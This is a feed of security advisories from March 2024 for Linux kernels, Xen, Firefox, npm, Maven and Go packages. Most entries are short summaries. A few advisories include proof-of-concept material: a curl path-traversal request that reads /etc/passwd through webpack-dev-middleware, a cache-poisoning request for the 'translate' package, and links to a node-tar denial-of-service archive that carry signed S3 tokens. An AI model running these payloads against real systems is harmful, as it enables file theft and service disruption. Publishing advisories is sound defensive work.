20.03.2024 16:23:19	ubuntu	[USN-6704-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-1
20.03.2024 15:09:50	ubuntu	[USN-6686-4] Linux kernel (KVM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-4
20.03.2024 13:15:08	alpinelinux	[ALPINE:CVE-2023-46839] xen vulnerability	[From CVE-2023-46839] PCI devices can make use of a functionality called phantom functions,that when enabled allows the device to generate requests using the IDsof functions that are otherwise unpopulated. This allows a device toextend the number of outstanding requests.Such phantom functions need an IOMMU context setup, but failure tosetup the context is not fatal when the device is assigned. Notfailing device assignment when such failure happens can lead to theprimary device being assigned to a guest, while some of the phantomfunctions are assigned to a different domain.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46839
20.03.2024 13:15:08	alpinelinux	[ALPINE:CVE-2023-46841] xen vulnerability	[From CVE-2023-46841] Recent x86 CPUs offer functionality named Control-flow EnforcementTechnology (CET). A sub-feature of this are Shadow Stacks (CET-SS).CET-SS is a hardware feature designed to protect against Return OrientedProgramming attacks. When enabled, traditional stacks holding both dataand return addresses are accompanied by so called "shadow stacks",holding little more than return addresses. Shadow stacks aren'twritable by normal instructions, and upon function returns theircontents are used to check for possible manipulation of a return addresscoming from the traditional stack.In particular certain memory accesses need intercepting by Xen. Invarious cases the necessary emulation involves kind of replaying ofthe instruction. Such replaying typically involves filling and theninvoking of a stub. Such a replayed instruction may raise anexceptions, which is expected and dealt with accordingly.Unfortunately the interaction of both of the above wasn't right:Recovery involves removal of a call frame from the (traditional) stack.The counterpart of this operation for the shadow stack was missing.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-46841
20.03.2024 09:00:00	msrc	[MS:CVE-2024-28916] Xbox Gaming Services Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-28916
20.03.2024 07:48:06	ubuntu	[USN-6703-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6703-1
20.03.2024 17:38:52	maven	[MAVEN:GHSA-8VVP-525H-CXF9] Cross-Site Request Forgery in Apache Wicket (moderate)	An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket.This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series.Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected.Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8VVP-525H-CXF9
20.03.2024 17:31:47	maven	[MAVEN:GHSA-F6G6-PJGC-5CJ5] Improper Input Validation vulnerability in Apache Hop Engine (moderate)	Improper Input Validation vulnerability in Apache Hop Engine. This issue affects Apache Hop Engine: before 2.8.0.Users are recommended to upgrade to version 2.8.0, which fixes the issue.When Hop Server writes links to the PrepareExecutionPipelineServlet page one of the parameters provided to the user was not properly escaped.The variable not properly escaped is the "id", which is not directly accessible by users creating pipelines making the risk of exploiting this low.This issue only affects users using the Hop Server component and does not directly affect the client.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F6G6-PJGC-5CJ5
21.03.2024 22:19:05	ubuntu	[USN-6700-2] Linux kernel (AWS) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6700-2
21.03.2024 20:59:29	npm	[NPM:GHSA-WR3J-PWJ9-HQQ6] Path traversal in webpack-dev-middleware (high)	### Summary_The webpack-dev-middleware middleware does not validate the supplied URL address sufficiently before returning the local file. It is possible to access any file on the developer's machine._### DetailsThe middleware can either work with the physical filesystem when reading the files or it can use a virtualized in-memory _memfs_ filesystem.If _writeToDisk_ configuration option is set to true, the physical filesystem is used:[https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21](https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/setupOutputFileSystem.js#L21)The _getFilenameFromUrl_ method is used to parse URL and build the local file path.The public path prefix is stripped from the URL, and the unsecaped path suffix is appended to the _outputPath_:[https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82](https://github.com/webpack/webpack-dev-middleware/blob/7ed24e0b9f53ad1562343f9f517f0f0ad2a70377/src/utils/getFilenameFromUrl.js#L82)As the URL is not unescaped and normalized automatically before calling the midlleware, it is possible to use _%2e_ and _%2f_ sequences to perform path traversal attack.### PoC_A blank project can be created containing the following configuration file webpack.config.js:_`module.exports = { devServer: { devMiddleware: { writeToDisk: true } }};`When started, it is possible to access any local file, e.g. _/etc/passwd_:`$ curl localhost:8080/public/..%2f..%2f..%2f..%2f../etc/passwd````root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologin```### ImpactThe developers using _webpack-dev-server_ or _webpack-dev-middleware_ are affected by the issue. When the project is started, an attacker might access any file on the developer's machine and exfiltrate the content (e.g. password, configuration files, private source code, ...).If the development server is listening on a public IP address (or 0.0.0.0), an attacker on the local network can access the local files without any interaction from the victim (direct connection to the port).If the server allows access from third-party domains (CORS, *_Allow-Access-Origin: _** ), an attacker can send a malicious link to the victim. When visited, the client side script can connect to the local server and exfiltrate the local files.### RecommendationThe URL should be unescaped and normalized before any further processing.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WR3J-PWJ9-HQQ6
21.03.2024 18:53:43	ubuntu	[USN-6709-1] OpenSSL vulnerabilities (medium)	Several security issues were fixed in OpenSSL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6709-1
21.03.2024 15:12:53	ubuntu	[USN-6707-2] Linux kernel (ARM laptop) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6707-2
21.03.2024 15:01:27	ubuntu	[USN-6704-2] Linux kernel (Raspberry Pi) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6704-2
21.03.2024 14:20:33	ubuntu	[USN-6708-1] Graphviz vulnerability (high)	Graphviz could be made to crash if it opened a specially craftedconfig6a file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6708-1
21.03.2024 20:59:09	maven	[MAVEN:GHSA-9W38-P64V-XPMV] Apache Commons Configuration: StackOverflowError calling ListDelimiterHandler.flatten(Object, int) with a cyclical object tree (moderate)	This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' calling 'ListDelimiterHandler.flatten(Object, int)' with a cyclical object tree.Users are recommended to upgrade to version 2.10.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9W38-P64V-XPMV
21.03.2024 20:58:54	maven	[MAVEN:GHSA-XJP4-HW94-MVP5] Apache Commons Configuration: StackOverflowError adding property in AbstractListDelimiterHandler.flattenIterator() (moderate)	This Out-of-bounds Write vulnerability in Apache Commons Configuration affects Apache Commons Configuration: from 2.0 before 2.10.1. User can see this as a 'StackOverflowError' when adding a property in 'AbstractListDelimiterHandler.flattenIterator()'.Users are recommended to upgrade to version 2.10.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XJP4-HW94-MVP5
21.03.2024 20:58:34	npm	[NPM:GHSA-XGJ4-2HRF-J4XG] Cross-site scripting in Survey Creator (moderate)	Cross Site Scripting (XSS) vulnerability in SurveyJS Survey Creator v.1.9.132 and before, allows attackers to execute arbitrary code and obtain sensitive information via the title parameter in form.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGJ4-2HRF-J4XG
21.03.2024 20:58:23	maven	[MAVEN:GHSA-4H5H-P23F-HJQF] SQL injection in Folio Spring Module Core (moderate)	A vulnerability was found in Folio Spring Module Core before 2.0.0. Affected by this issue is the function dropSchema of the file tenant/src/main/java/org/folio/spring/tenant/hibernate/HibernateSchemaService.java of the component Schema Name Handler. The manipulation leads to sql injection. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is d374a5f77e6b58e36f0e0e4419be18b95edcd7ff. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-257516.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4H5H-P23F-HJQF
21.03.2024 10:51:52	almalinux	[ALSA-2024:1435] postgresql-jdbc security update (important)	postgresql-jdbc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1435
21.03.2024 16:33:21	almalinux	[ALSA-2024:1444] nodejs:16 security update (important)	nodejs:16 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1444
21.03.2024 14:39:03	almalinux	[ALSA-2024:1436] postgresql-jdbc security update (important)	postgresql-jdbc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1436
21.03.2024 09:08:57	almalinux	[ALSA-2024:1438] nodejs security update (important)	nodejs security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1438
21.03.2024 14:51:00	almalinux	[ALSA-2024:1431] ruby:3.1 security, bug fix, and enhancement update (moderate)	ruby:3.1 security, bug fix, and enhancement update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1431
22.03.2024 20:19:24	go	[GO-2024-2659] Data exfiltration from internal networks in github.com/docker/docker (medium)	dockerd forwards DNS requests to the host loopback device, bypassing thecontainer network namespace's normal routing semantics, networks marked as'internal' can unexpectedly forward DNS requests to an external nameserver. Byregistering a domain for which they control the authoritative nameservers, anattacker could arrange for a compromised container to exfiltrate data byencoding it in DNS queries that will eventually be answered by theirnameservers.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2659
22.03.2024 22:02:16	npm	[NPM:GHSA-882J-4VJ5-7VMJ] Cache Poisoning Vulnerability (moderate)	### SummaryAn attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users.### DetailsThe `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served.### PoCTake the following simple server allowing users to supply text and the language to translate to.```javascriptimport translate from "translate";import express from 'express';const app = express();app.use(express.json());app.post('/translate', async (req, res) => { const { text, language } = req.body; const result = await translate(text, language); return res.json(result);});const port = 3000;app.listen(port, () => { console.log(`Server is running on port ${port}`);});```We can send the following request to poison the cache:```{"text":"I hate you", "language":{"to":"nl","id":"undefined:en:nl:google:I love you"}}```![Poisoning the cache](https://user-images.githubusercontent.com/44903767/285421743-ccfa3d9d-24cf-47b7-b805-0e4034cec82e.png)Now, any user that attempts to translate "I love you" to Dutch, will get "I hate you" in Dutch as the response.![The victim gets our poisoned data](https://user-images.githubusercontent.com/44903767/285422033-b3853ca2-8a5a-4875-91e8-ba2ef0258bc6.png)### ImpactAn attacker can control the results other users may get	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-882J-4VJ5-7VMJ
22.03.2024 18:57:07	npm	[NPM:GHSA-F5X3-32G6-XQ36] Denial of service while parsing a tar file due to lack of folders count validation (moderate)	## Description: During some analysis today on npm's `node-tar` package I came across the folder creation process, Basicly if you provide node-tar with a path like this `./a/b/c/foo.txt` it would create every folder and sub-folder here a, b and c until it reaches the last folder to create `foo.txt`, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside## Steps To Reproduce:You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video## Proof Of Concept:Here's a (https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/3i7uojw8s52psar6pg8zkdo4h9io?response-content-disposition=attachment%3B%20filename%3D%22tar-dos-poc.webm%22%3B%20filename%2A%3DUTF-8%27%27tar-dos-poc.webm&response-content-type=video%2Fwebm&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=1e8235d885f1d61529b7d6b23ea3a0780c300c91d86e925dd8310d5b661ddbe2) show-casing the exploit: ## ImpactDenial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources## Report resources[payload.txt](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/1e83ayb5dd3350fvj3gst0mqixwk?response-content-disposition=attachment%3B%20filename%3D%22payload.txt%22%3B%20filename%2A%3DUTF-8%27%27payload.txt&response-content-type=text%2Fplain&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=bad9fe731f05a63a950f99828125653a8c1254750fe0ca7be882e89ecdd449ae)[archeive.tar.gz](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/ymkuh4xnfdcf1soeyi7jc2x4yt2i?response-content-disposition=attachment%3B%20filename%3D%22archive.tar.gz%22%3B%20filename%2A%3DUTF-8%27%27archive.tar.gz&response-content-type=application%2Fx-tar&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQSWWGDXHA%2F20240312%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20240312T080103Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEDcaCXVzLXdlc3QtMiJHMEUCID3xYDc6emXVPOg8iVR5dVk0u3gguTPIDJ0OIE%2BKxj17AiEAi%2BGiay1gGMWhH%2F031fvMYnSsa8U7CnpZpxvFAYqNRwgqsQUIQBADGgwwMTM2MTkyNzQ4NDkiDAaj6OgUL3gg4hhLLCqOBUUrOgWSqaK%2FmxN6nKRvB4Who3LIyzswFKm9LV94GiSVFP3zXYA480voCmAHTg7eBL7%2BrYgV2RtXbhF4aCFMCN3qu7GeXkIdH7xwVMi9zXHkekviSKZ%2FsZtVVjn7RFqOCKhJl%2FCoiLQJuDuju%2FtfdTGZbEbGsPgKHoILYbRp81K51zeRL21okjsOehmypkZzq%2BoGrXIX0ynPOKujxw27uqdF4T%2BF9ynodq01vGgwgVBEjHojc4OKOfr1oW5b%2FtGVV59%2BOBVI1hqIKHRG0Ed4SWmp%2BLd1hazGuZPvp52szmegnOj5qr3ubppnKL242bX%2FuAnQKzKK0HpwolqXjsuEeFeM85lxhqHV%2B1BJqaqSHHDa0HUMLZistMRshRlntuchcFQCR6HBa2c8PSnhpVC31zMzvYMfKsI12h4HB6l%2FudrmNrvmH4LmNpi4dZFcio21DzKj%2FRjWmxjH7l8egDyG%2FIgPMY6Ls4IiN7aR1jijYTrBCgPUUHets3BFvqLzHtPFnG3B7%2FYRPnhCLu%2FgzvKN3F8l38KqeTNMHJaxkuhCvEjpFB2SJbi2QZqZZbLj3xASqXoogzbsyPp0Tzp0tH7EKDhPA7H6wwiZukXfFhhlYzP8on9fO2Ajz%2F%2BTDkDjbfWw4KNJ0cFeDsGrUspqQZb5TAKlUge7iOZEc2TZ5uagatSy9Mg08E4nImBSE5QUHDc7Daya1gyqrETMDZBBUHH2RFkGA9qMpEtNrtJ9G%2BPedz%2FpPY1hh9OCp9Pg1BrX97l3SfVzlAMRfNibhywq6qnE35rVnZi%2BEQ1UgBjs9jD%2FQrW49%2FaD0oUDojVeuFFryzRnQxDbKtYgonRcItTvLT5Y0xaK9P0u6H1197%2FMk3XxmjD9%2Fb%2BvBjqxAQWWkKiIxpC1oHEWK9Jt8UdJ39xszDBGpBqjB6Tvt5ePAXSyX8np%2FrBi%2BAPx06O0%2Ba7pU4NmH800EVXxxhgfj9nMw3CeoUIdxorVKtU2Mxw%2FLaAiPgxPS4rqkt65NF7eQYfegcSYDTm2Z%2BHPbz9HfCaVZ28Zqeko6sR%2F29ML4bguqVvHAM4mWPLNDXH33mjG%2BuzLi8e1BF7tNveg2X9G%2FRdcMkojwKYbu6xN3M6aX2alQg%3D%3D&X-Amz-SignedHeaders=host&X-Amz-Signature=5e2c0d4b4de40373ac0fe91908c2659141a6dd4ab850271cc26042a3885c82ea)## NoteThis report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-F5X3-32G6-XQ36
22.03.2024 23:22:19	go	[GO-2024-2657] Unencrypted traffic between nodes with WireGuard in github.com/cilium/cilium (medium)	In Cilium clusters with WireGuard enabled and traffic matching Layer 7 policies:traffic that should be WireGuard-encrypted is sent unencrypted between a node'sEnvoy proxy and pods on other nodes, and traffic that should beWireGuard-encrypted is sent unencrypted between a node's DNS proxy and pods onother nodes.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2657
22.03.2024 09:00:00	msrc	[MS:CVE-2024-28916] Xbox Gaming Services Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-28916
22.03.2024 09:00:00	msrc	[MS:CVE-2024-26247] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26247
22.03.2024 09:00:00	msrc	[MS:CVE-2024-29057] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-29057
22.03.2024 09:00:00	msrc	[MS:CVE-2024-2625] Chromium: CVE-2024-2625 Object lifecycle issue in V8		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2625
22.03.2024 09:00:00	msrc	[MS:CVE-2024-2626] Chromium: CVE-2024-2626 Out of bounds read in Swiftshader		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2626
22.03.2024 09:00:00	msrc	[MS:CVE-2024-2627] Chromium: CVE-2024-2627 Use after free in Canvas		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2627
22.03.2024 09:00:00	msrc	[MS:CVE-2024-2628] Chromium: CVE-2024-2628 Inappropriate implementation in Downloads		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2628
22.03.2024 09:00:00	msrc	[MS:CVE-2024-2629] Chromium: CVE-2024-2629 Incorrect security UI in iOS		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2629
22.03.2024 09:00:00	msrc	[MS:CVE-2024-2630] Chromium: CVE-2024-2630 Inappropriate implementation in iOS		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2630
22.03.2024 09:00:00	msrc	[MS:CVE-2024-2631] Chromium: CVE-2024-2631 Inappropriate implementation in iOS		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2631
22.03.2024 23:22:19	go	[GO-2024-2656] Unencrypted traffic between nodes with IPsec in github.com/cilium/cilium (medium)	In Cilium clusters with IPsec enabled and traffic matching Layer 7 policies,traffic that should be IPsec-encrypted between a node's Envoy proxy and pods onother nodes is sent unencrypted, and traffic that should be IPsec-encryptedbetween a node's DNS proxy and pods on other nodes is sent unencrypted.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2656
22.03.2024 08:08:21	go	[GO-2024-2653] HTTP policy bypass in github.com/cilium/cilium (high)	Cilium's HTTP policies are not consistently applied to all traffic in the scopeof the policies, leading to HTTP traffic being incorrectly and intermittentlyforwarded when it should be dropped.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2653
22.03.2024 02:00:00	mozilla	[MFSA-2024-15] Security Vulnerabilities fixed in Firefox 124.0.1 (critical)	- CVE-2024-29943: Out-of-bounds access via Range Analysis bypass (critical)An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination.- CVE-2024-29944: Privileged JavaScript Execution via Event Handlers (critical)An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. <em>Note:</em> This vulnerability affects Desktop Firefox only, it does not affect mobile versions of Firefox.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-15
22.03.2024 02:00:00	mozilla	[MFSA-2024-16] Security Vulnerabilities fixed in Firefox ESR 115.9.1 (critical)	- CVE-2024-29944: Privileged JavaScript Execution via Event Handlers (critical)An attacker was able to inject an event handler into a privileged object that would allow arbitrary JavaScript execution in the parent process. <em>Note:</em> This vulnerability affects Desktop Firefox only, it does not affect mobile versions of Firefox.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-16
22.03.2024 02:00:00	oraclelinux	[ELSA-2024-1472] go-toolset:ol8 security update (important)	delve[1.20.2-1.0.1]- Disable DWARF compression which has issues (Alex Burmashev)[1.20.2-1]- Rebase to 1.20.2- Resolves: rhbz#2186495golang[1.20.12-3]- Fix CVE-2024-1394- Resolves: RHEL-27928[1.20.12-2]- Fix sources file- Related: RHEL-19231go-toolset	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1472
22.03.2024 01:16:29	go	[GO-2024-2654] Denial of service in github.com/argoproj/argo-cd/v2 (high)	Application may crash due to concurrent writes, leading to a denial of service.An attacker can crash the application continuously, making it impossible forlegitimate users to access the service. Authentication is not required in theattack.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2654
22.03.2024 00:42:40	go	[GO-2024-2652] Brute force protection bypass in github.com/argoproj/argo-cd/v2 (critical)	An attacker can effectively bypass the rate limit and brute force protections inArgo CD by exploiting the application's weak cache-based mechanism. Theapplication's brute force protection relies on a cache mechanism that trackslogin attempts for each user. An attacker can overflow this cache by bombardingit with login attempts for different users, thereby pushing out the adminaccount's failed attempts and effectively resetting the rate limit for thataccount.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2652
21.03.2024 23:50:54	go	[GO-2024-2646] Cross-site scripting on application summary component ingithub.com/argoproj/argo-cd/v2 (critical)	Due to the improper URL protocols filtering of links specified in thelink.argocd.argoproj.io annotations in the application summary component, anattacker can achieve cross-site scripting with elevated permissions. A malicioususer to inject a javascript: link in the UI. When clicked by a victim user, thescript will execute with the victim's permissions (up to and including admin).This vulnerability allows an attacker to perform arbitrary actions on behalf ofthe victim via the API, such as creating, modifying, and deleting Kubernetesresources.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2646
21.03.2024 23:35:06	go	[GO-2024-2643] Bypass manifest during application creation in github.com/argoproj/argo-cd/v2 (medium)	An improper validation bug allows users who have create privilegesto sync a local manifest during application creation. This allows for bypassingthe restriction that the manifests come from some approved git/Helm/OCI source.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2643
22.03.2024 11:53:38	almalinux	[ALSA-2024:1472] go-toolset:rhel8 security update (important)	go-toolset:rhel8 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1472
22.03.2024 16:43:50	almalinux	[ALSA-2024:1462] golang security update (important)	golang security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1462
22.03.2024 16:57:34	almalinux	[ALSA-2024:1427] libreoffice security update (important)	libreoffice security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1427
